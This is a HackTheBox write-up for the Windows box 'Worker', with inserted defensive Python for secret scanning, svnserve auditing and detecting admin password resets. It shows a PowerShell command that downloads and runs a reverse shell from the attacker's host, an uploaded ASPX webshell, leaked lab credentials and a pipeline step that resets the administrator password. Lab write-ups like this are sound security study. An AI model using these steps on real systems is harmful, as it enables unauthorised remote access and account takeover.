Worker HackTheBox WalkThrough

This is the Worker HackTheBox walkthrough. In this writeup I demonstrate step by step how I rooted the Worker HTB box. Before starting, a few facts about the box: it is a Windows machine with IP address 10.10.10.203, and its maker assigned it a difficulty of medium.
Before starting, connect your PC to the VPN and confirm connectivity by pinging 10.10.10.203. If that works, it is time to start hacking.
As usual, I started by scanning the box. Scanning gives an idea of how to proceed: it grabs the banners of the services running on the open ports and sometimes points at vulnerabilities as well. Nmap (a port scanner) gave the following result:
Scanning
$ nmap -sC -sV -T4 -oN worker_scan 10.10.10.203

Nmap discovered that ports 80 and 3690 are open: Microsoft IIS is running on port 80 and svnserve on port 3690. Going to http://10.10.10.203/ showed the default Microsoft IIS page. I checked the page source for hyperlinks to other pages but found nothing interesting except the link to Microsoft's official page, so I left it there and moved on to enumerating port 3690.
I did not know anything about svnserve, but after some googling I found this interesting article. It explains the svn tool, which is used to access an SVN server remotely. After playing with it for a while I found a subdomain, dimension.worker.htb, and a file, deploy.ps1.
$ svn list --verbose -r 2 svn://10.10.10.203/

After some more enumeration I found a way to dump the content of deploy.ps1 from the revision history.
$ svn diff -r 2 svn://10.10.10.203/

This gave the credentials nathen : wendel98 and a new subdomain, devops.worker.htb. I did not know whose credentials they were, but as usual I added them to my notes; they might be useful later. Now we have two subdomains, dimension.worker.htb and devops.worker.htb, and I added both to my hosts file.
Modified Hosts File
$ cat /etc/hosts
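Credentials committed to a repository stay in its history even after a later revision removes them, which is exactly how deploy.ps1 leaked here. As an added example (not code from this writeup), the scanner below walks `svn diff` output the way a pre-commit hook or a per-revision history audit would, and reports credential-like material on added lines, attributed to the file named in the `Index:` header. The diff text, file contents, host names and secret values are all constructed; only the file name deploy.ps1 comes from the box.

```python
import re
from typing import Dict, List, Optional

# Constructed sample of `svn diff -r 2` output (not the real deploy.ps1 from
# the box): a deployment script and a config file that carry credentials.
SAMPLE_SVN_DIFF = """Index: moved.txt
===================================================================
--- moved.txt\t(nonexistent)
+++ moved.txt\t(revision 2)
@@ -0,0 +1 @@
+This repository has been moved to the DevOps server.
Index: deploy.ps1
===================================================================
--- deploy.ps1\t(nonexistent)
+++ deploy.ps1\t(revision 2)
@@ -0,0 +1,5 @@
+$user = "svc_deploy"
+$password = "S3cret!Example"
+$secpwd = ConvertTo-SecureString $password -AsPlainText -Force
+$creds = New-Object System.Management.Automation.PSCredential($user, $secpwd)
+Invoke-WebRequest -Uri http://devops.example.test/ -Credential $creds
Index: web.config
===================================================================
--- web.config\t(nonexistent)
+++ web.config\t(revision 2)
@@ -0,0 +1,3 @@
+<configuration>
+  <add key="DbConn" value="Server=db;User Id=app;Password=Example1;" />
+</configuration>
"""

# Ordered (label, regex) pairs; the first rule that matches a line wins, so a
# PowerShell assignment is not reported a second time by the generic rule.
SECRET_PATTERNS = [
    ("powershell_string_assignment",
     re.compile(r'^\$(\w*(?:pass|pwd|secret|token|key)\w*)\s*=\s*["\']([^"\']+)["\']', re.I)),
    ("securestring_from_plaintext",
     re.compile(r'ConvertTo-SecureString\s+(\S+)\s+-AsPlainText', re.I)),
    ("key_value_secret",
     re.compile(r'\b(\w*(?:password|passwd|secret|api[_-]?key|token)\w*)\s*[:=]\s*["\']?([^"\'\s;]+)', re.I)),
]


def mask(value: Optional[str]) -> Optional[str]:
    """Keep a two-character hint so the finding can be matched to the file; hide the rest."""
    if value is None:
        return None
    return value[:2] + "*" * max(len(value) - 2, 0)


def scan_svn_diff(diff_text: str) -> List[Dict[str, object]]:
    """Walk a unified diff as emitted by `svn diff` and report credential-like
    material on added ('+') lines, with the new-file line number taken from the
    @@ hunk header."""
    findings: List[Dict[str, object]] = []
    current_file = "<unknown>"
    line_no = 0
    for raw in diff_text.splitlines():
        if raw.startswith("Index: "):
            current_file = raw[len("Index: "):].strip()
            continue
        if raw.startswith(("+++ ", "--- ", "===")):
            continue
        hunk = re.match(r"@@ -\d+(?:,\d+)? \+(\d+)(?:,\d+)? @@", raw)
        if hunk:
            line_no = int(hunk.group(1)) - 1
            continue
        if raw.startswith("-"):
            continue  # removed line: not part of this revision's content
        line_no += 1  # context (' ') and added ('+') lines both advance
        if not raw.startswith("+"):
            continue
        content = raw[1:]
        for label, rx in SECRET_PATTERNS:
            m = rx.search(content)
            if m:
                value = m.group(2) if m.lastindex and m.lastindex >= 2 else None
                findings.append({"file": current_file, "line": line_no, "label": label,
                                 "name": m.group(1), "value": mask(value)})
                break
    return findings


if __name__ == "__main__":
    for f in scan_svn_diff(SAMPLE_SVN_DIFF):
        print(f"{f['file']}:{f['line']} {f['label']} {f['name']} -> {f['value']}")
```

Run it against each revision (`svn diff -c N`) rather than only the head, because a secret removed in revision 5 is still readable in revision 2, as it was on this box.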

Going to http://dimension.worker.htb/#work revealed more subdomains: alpha.worker.htb, cartoon.worker.htb, solid-state.worker.htb, spectral.worker.htb, story.worker.htb and lens.worker.htb. I added them all to my hosts file, so the final hosts file looks like this.
Modified Hosts File
$ cat /etc/hosts

The subdomains alpha.worker.htb, cartoon.worker.htb, solid-state.worker.htb, spectral.worker.htb, story.worker.htb and lens.worker.htb had nothing interesting on them, so I left them. Going to http://devops.worker.htb gave a login page like the one on a Tomcat web server. I tried the credentials nathen:wendel98 and logged in successfully.

Upon login I found that it is a Microsoft Azure DevOps platform. For more information about Microsoft Azure you can watch this video. It is a cloud-based service that lets us create and deploy custom packages by uploading them directly to the server.
We will take advantage of this upload-and-deploy feature: upload our command shell and deploy it from a branch we create.
To get a shell on my PC I followed these steps.
1. Created a branch named MyBranch1 in Repos.
2. Uploaded the cmdasp.aspx command shell into the spectral folder inside the branch MyBranch1.
The command shell can be found in the directory /usr/share/webshells/aspx/ on Kali Linux.
3. Then committed, created a pull request and finally approved it.
Once the package is approved, it can be accessed at http://spectral.worker.htb/cmdasp.aspx .
Since we upload the command shell into the spectral directory, it is served at the subdomain spectral.worker.htb. Had we used another folder, such as lens, it would be reachable at lens.worker.htb.
The detailed steps I followed are below.
Uploading & Deploying Package
1. Log in to DevOps with the credentials nathen : wendel98
2. Click on SmartHotel360.

3. On the left pane of the window click the Branches option under the Repos menu, then click New Branch to create a new branch.

4. Provide the name MyBranch1 and click Create branch.

5. Once the branch is created, click it to open all the files inside the branch.

6. Upload the cmdasp.aspx command shell by choosing Upload files, then click the Commit button to commit the upload.

7. Once the commit succeeds, click Create a pull request to open a pull request for it.

8. Enter anything as the Title and choose Nathalie Henley as the reviewer. In addition, choose either of the two Work Items and click Create.

9. Click Approve, Complete and then Complete Merge. Before clicking Complete Merge, make sure to uncheck the second option, Delete MyBranch1 after merging.

After Complete Merge you will see the following message.

Now all is set. Go to http://spectral.worker.htb/cmdasp.aspx to access the command shell and confirm the host by executing whoami && ipconfig.

Now we have remote command execution. It is time to get a reverse shell in our terminal. There are multiple ways to get one; I used Invoke-PowerShellTcp.ps1 from here.
Getting Shell through RCE
To get a shell I did the following:
1. Downloaded the shell from the URL above
2. Changed the IP address and port number inside Invoke-PowerShellTcp.ps1 to my tun0 IP and listener port
3. Started a netcat listener locally
4. Started a Python HTTP server locally
5. Executed the following command in the command shell at http://spectral.worker.htb/cmdasp.aspx
$ powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.12/Invoke-PowerShellTcp.ps1')"
Note: If you do not get the command shell, refresh http://spectral.worker.htb/cmdasp.aspx four or five times; the deployment may take some time.

We got a shell. After some initial enumeration I found a drive W: on the Worker machine and, in the directory W:\svnrepos\www\conf\, a file named passwd. It contains the credentials of all SVN users, among them the user robisl, who also has a profile in C:\Users\. The credential is robisl:wolves11.
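The file that svnserve's `password-db` setting points to stores every password in cleartext, and here one of those passwords was also valid for a Windows account on the same host. The audit below is an added example, not anything from the writeup: it parses constructed svnserve.conf and passwd files (the INI layout svnserve uses) and reports the anonymous-access setting, the cleartext accounts, passwords shared between SVN accounts, and SVN accounts that also exist as local Windows users, which is where password reuse turns a repository leak into a host login. The account names, passwords and Windows user list are constructed.

```python
import configparser
from typing import Dict, List, Set

# Constructed sample of a repository's conf/ directory (not the files from the box).
SAMPLE_SVNSERVE_CONF = """[general]
anon-access = read
auth-access = write
password-db = passwd
realm = www
"""

SAMPLE_PASSWD = """[users]
alice = Example-Pass-1
bob = Example-Pass-2
carol = Example-Pass-1
"""

# Constructed list of local Windows account names (as from `net user` or C:\Users).
SAMPLE_WINDOWS_USERS = {"Administrator", "carol", "svc_build"}


def parse_ini(text: str) -> configparser.ConfigParser:
    """svnserve's files are plain 'key = value' INI with '#' comments; keep key case."""
    cp = configparser.ConfigParser(interpolation=None, comment_prefixes=("#", ";"))
    cp.optionxform = str
    cp.read_string(text)
    return cp


def audit_svnserve(conf_text: str, passwd_text: str, windows_users: Set[str]) -> Dict[str, object]:
    conf = parse_ini(conf_text)
    general = conf["general"] if conf.has_section("general") else {}
    findings: List[str] = []

    # svnserve's built-in default for anon-access is 'read'
    anon = general.get("anon-access", "read")
    if anon != "none":
        findings.append(f"anon-access is '{anon}': unauthenticated clients can enumerate the repository")

    # password-db names a file whose [users] section holds cleartext passwords
    users: Dict[str, str] = {}
    if general.get("password-db"):
        pw = parse_ini(passwd_text)
        if pw.has_section("users"):
            users = dict(pw["users"].items())
    if users:
        findings.append(f"{len(users)} account(s) stored with cleartext passwords in password-db")

    # Several SVN accounts sharing one password
    by_password: Dict[str, List[str]] = {}
    for user, pwd in users.items():
        by_password.setdefault(pwd, []).append(user)
    shared = sorted(sorted(group) for group in by_password.values() if len(group) > 1)
    for group in shared:
        findings.append(f"accounts {group} share one password")

    # SVN account names that also exist as Windows accounts on the host
    win_lower = {w.lower() for w in windows_users}
    overlap = sorted(u for u in users if u.lower() in win_lower)
    if overlap:
        findings.append(f"SVN accounts also present on the host: {overlap}; verify the passwords differ")

    return {"anon_access": anon, "users": sorted(users), "shared_password_groups": shared,
            "host_overlap": overlap, "findings": findings}


if __name__ == "__main__":
    report = audit_svnserve(SAMPLE_SVNSERVE_CONF, SAMPLE_PASSWD, SAMPLE_WINDOWS_USERS)
    for line in report["findings"]:
        print("-", line)
```

The fix on the server side is to set `anon-access = none`, move authentication to SASL or a front end that does not keep cleartext passwords, and make sure repository service accounts never share a password with an interactive Windows account.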

I tried to log in remotely with the credentials robisl:wolves11 using evil-winrm (a Windows Remote Management tool) and succeeded.
Login using Evil-Winrm
$ evil-winrm -i 10.10.10.203 -u robisl -p wolves11

Capture User Flag
$ type ..\Desktop\user.txt

Privilege Escalation
To escalate privileges I did the following:
1. Logged in to devops.worker.htb with the credentials robisl : wolves11
2. Created a pipeline
3. Chose “Azure Repos Git” for importing code
4. Clicked the repository PartsUnlimited, then chose Starter pipeline as the platform
5. Finally added a custom command to the script to change the administrator password, then saved and ran the pipeline to execute it.
Following the above steps:
Creating Pipeline & Running Script
1. Click on PartsUnlimited

2. On the left pane click the Pipelines option.

3. Then click New pipeline.

4. Choose Azure Repos Git

5. Click on PartsUnlimited

6. Select Starter pipeline as the platform.

7. Edit the code by adding net user administrator ThisIsNewPASSWD@123, then click Save and run. The cmd command we introduced into the azure-pipelines.yml file will change the administrator password to ThisIsNewPASSWD@123.

8. Type MyPipeline as the name in the review dialog box, then Save and run.

After a successful run you will see the following window.

Our administrator password is changed. We can now log in remotely to the Worker machine using evil-winrm with the credentials administrator:ThisIsNewPASSWD@123
$ evil-winrm -i 10.10.10.203 -u administrator -p ThisIsNewPASSWD@123
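A pipeline step on a self-hosted agent runs with the agent's own identity, so anyone who can edit azure-pipelines.yml gets that identity's privileges on the host. A password reset like the one above is recorded on the machine as Security event 4724 (an attempt was made to reset an account's password), with the resetting identity in SubjectUserName and the victim in TargetUserName/TargetSid. The detection below is an added example, not part of the writeup: it parses constructed event XML and alerts when the built-in Administrator (RID 500) is reset by a service identity (the computer account acting as SYSTEM, or an agent account the defender lists) rather than by an interactive administrator. Host name, SIDs, timestamps and the agent account name svc_azagent are all constructed.

```python
import xml.etree.ElementTree as ET
from typing import Dict, Iterable, List, Set

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Constructed sample events (not real logs from the box), in the Security log's
# XML shape: 4724 = password reset attempt, 4738 = user account changed.
SAMPLE_EVENTS = [
    # Reset of Administrator performed in the SYSTEM context (computer account, logon id 0x3e7)
    """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4724</EventID><Computer>worker.example.test</Computer>
    <TimeCreated SystemTime="2020-08-16T10:15:02.000Z"/></System>
  <EventData>
    <Data Name="TargetUserName">Administrator</Data>
    <Data Name="TargetDomainName">WORKER</Data>
    <Data Name="TargetSid">S-1-5-21-1111111111-2222222222-3333333333-500</Data>
    <Data Name="SubjectUserName">WORKER$</Data>
    <Data Name="SubjectDomainName">WORKGROUP</Data>
    <Data Name="SubjectLogonId">0x3e7</Data>
  </EventData></Event>""",
    # Help-desk user resetting an ordinary account: expected activity
    """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4724</EventID><Computer>worker.example.test</Computer>
    <TimeCreated SystemTime="2020-08-16T10:20:45.000Z"/></System>
  <EventData>
    <Data Name="TargetUserName">jdoe</Data>
    <Data Name="TargetSid">S-1-5-21-1111111111-2222222222-3333333333-1105</Data>
    <Data Name="SubjectUserName">helpdesk01</Data>
    <Data Name="SubjectLogonId">0x5a3f2</Data>
  </EventData></Event>""",
    # Reset of Administrator by a listed build-agent service account
    """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4724</EventID><Computer>worker.example.test</Computer>
    <TimeCreated SystemTime="2020-08-16T10:31:10.000Z"/></System>
  <EventData>
    <Data Name="TargetUserName">Administrator</Data>
    <Data Name="TargetSid">S-1-5-21-1111111111-2222222222-3333333333-500</Data>
    <Data Name="SubjectUserName">svc_azagent</Data>
    <Data Name="SubjectLogonId">0x7c001</Data>
  </EventData></Event>""",
    # Unrelated account change: ignored by this rule
    """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4738</EventID><Computer>worker.example.test</Computer>
    <TimeCreated SystemTime="2020-08-16T10:31:11.000Z"/></System>
  <EventData>
    <Data Name="TargetUserName">Administrator</Data>
    <Data Name="SubjectUserName">svc_azagent</Data>
  </EventData></Event>""",
]


def parse_event(xml_text: str) -> Dict[str, str]:
    """Flatten one event into a dict of the System fields we need plus every EventData/Data."""
    root = ET.fromstring(xml_text)
    system = root.find("e:System", NS)
    fields: Dict[str, str] = {
        "EventID": system.findtext("e:EventID", default="", namespaces=NS),
        "Computer": system.findtext("e:Computer", default="", namespaces=NS),
    }
    tc = system.find("e:TimeCreated", NS)
    fields["TimeCreated"] = tc.get("SystemTime", "") if tc is not None else ""
    for data in root.iterfind("e:EventData/e:Data", NS):
        fields[data.get("Name", "")] = (data.text or "").strip()
    return fields


def is_privileged_target(ev: Dict[str, str]) -> bool:
    # RID 500 is the built-in Administrator whatever it has been renamed to
    return ev.get("TargetSid", "").endswith("-500") or ev.get("TargetUserName", "").lower() == "administrator"


def is_automation_subject(ev: Dict[str, str], automation_accounts: Set[str]) -> bool:
    # SYSTEM appears as the computer account (name ends in '$', logon id 0x3e7);
    # build/deployment service accounts are listed explicitly by the defender
    name = ev.get("SubjectUserName", "")
    listed = {a.lower() for a in automation_accounts}
    return name.endswith("$") or ev.get("SubjectLogonId", "").lower() == "0x3e7" or name.lower() in listed


def detect_admin_resets(events: Iterable[str], automation_accounts: Set[str]) -> List[Dict[str, str]]:
    """Alert on 4724 events where a service identity resets a privileged account."""
    alerts: List[Dict[str, str]] = []
    for xml_text in events:
        ev = parse_event(xml_text)
        if ev["EventID"] != "4724":
            continue
        if not (is_privileged_target(ev) and is_automation_subject(ev, automation_accounts)):
            continue
        why = "built-in Administrator (RID 500)" if ev.get("TargetSid", "").endswith("-500") else "account named Administrator"
        alerts.append({"time": ev["TimeCreated"], "host": ev["Computer"],
                       "subject": ev.get("SubjectUserName", ""), "target": ev.get("TargetUserName", ""),
                       "reason": f"password reset of {why} by service identity"})
    return alerts


if __name__ == "__main__":
    for a in detect_admin_resets(SAMPLE_EVENTS, {"svc_azagent"}):
        print(f"{a['time']} {a['host']}: {a['subject']} -> {a['target']}: {a['reason']}")
```

The rule is deliberately narrow; the broader mitigation is to run the agent as a dedicated low-privilege account and to require approval on pipeline changes, so that editing a YAML file is not equivalent to administrator on the build host.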

Capture Root Flag
$ type ..\Desktop\root.txt

This is how I rooted Worker on HackTheBox. I learnt a lot from hunting this box and hope you have learnt something new from it too. Thanks for reading this writeup. For any suggestions or queries related to the walkthrough, feel free to contact us at [email protected].
For more HackTheBox walkthroughs, visit ethicalhacs.com.
